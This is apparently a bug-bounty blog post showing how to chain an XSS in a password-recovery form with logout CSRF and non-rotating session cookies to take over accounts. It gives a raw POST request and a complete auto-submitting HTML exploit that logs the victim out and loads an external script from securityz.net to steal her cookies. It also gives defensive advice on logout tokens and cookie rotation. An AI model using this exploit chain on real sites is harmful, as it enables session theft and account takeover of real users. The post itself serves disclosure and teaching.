How to use an XSS in a login / remember-password / registration form

So, we have a stored or reflected XSS in the "Forgot your password" form.

But we cannot attack a user with it directly, because the XSS is not inside the user's account. And if we cannot provide a convincing PoC, the bug counts as no real threat and cannot claim a larger bug-bounty reward!

However, turning it into an XSS inside the user's account is fairly easy, and here is how to do it.

There is a page http://example.com/rememberpassword

It takes a POST request, and the email parameter is not filtered at all (the Content-Length of 159 matches the body below with the payload written out unencoded):

POST /rememberpassword HTTP/1.1
Host: example.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
formName=rememberpassword&email="><script src=http://securityz.net/evil.js></script>&humanizm%5Bid%5D=32d2d845d4793a3e75d13d7fc8187aea&humanizm%5Binput%5D=1596

In general, our task is to lure the victim to http://example.com/rememberpassword, run our code there and steal her cookies. But this does not work while the victim is logged into her account.

Two more vulnerabilities come to our aid here.

The first vulnerability: logout CSRF.
1) You can log the victim out without her consent: any request to http://example.com/en/account?option=logout sent from her browser ends her session.

To prevent this, each logout link must carry a unique CSRF token, as for example in the social network vk: https://login.vk.com/?act=logout&hash=8b8bcf7f3cbd6d32d5&_origin=https://vk.com .

2) The second vulnerability is broken authentication and session management: when the victim logs out of her account and then logs in again, the cookies do not change! This is dangerous (number 2 in the OWASP Top 10 2013, https://www.owasp.org/index.php/Top_10_2013-Top_10 ) and can be exploited in combination with other bugs. The application must issue new cookie values on every login. Test it twice: compare the cookies after logout and again after the next login; if not a single character has changed, the bug is there.
The second bug is passive; on its own there is nothing to do with it. With the first one we write our automatic CSRF exploit: the logout link is embedded in the page as an image, and a form then auto-submits the XSS payload to the password-recovery page:

<html>
<head>
<script>
// Submits the XSS payload to the password-recovery page.
function go() { document.getElementById("qiece").click(); }
</script>
</head>
<body>
<form action="http://example.com/rememberpassword" method="POST">
<input type="hidden" name="formName" value="rememberpassword" />
<!-- the unfiltered email field carries the script tag -->
<input type="hidden" name="email" value='"><script src=http://securityz.net/evil.js></script>' />
<input type="hidden" name="humanizm[id]" value="d8ac3bdda21255b54bcdd549bb15962c" />
<input type="hidden" name="humanizm[input]" value="" />
<input type="submit" id="qiece" value="Submit request" />
</form>
<!-- Logout CSRF: the image request carries the victim's cookies and logs her out.
     The form is submitted only once that request has finished (onload or onerror,
     the response is not an image), so the POST cannot race ahead of the logout. -->
<img src="http://example.com/en/account?option=logout" onload="go()" onerror="go()">
</body>
</html>

Well, our exploit is done.

And once we have stolen the victim's cookies we can freely log into her account, because THE COOKIES ARE NOT DESTROYED AFTER LOGOUT!! The value we captured while she was logged out becomes a valid session again the moment she logs back in.

I have run into similar vulnerabilities (logout CSRF / broken authentication) everywhere, and with their help, together with an XSS that is not in the user account or with a sniffer, an account can easily be hacked (unless, of course, the cookie is HttpOnly).

If you enjoyed this article, follow me on Twitter https://twitter.com/MaximYaremchuk / retweet, and I'll add more articles as my research into web application security goes on 🙂

#bugbounty #xss #BrokenAuthentication
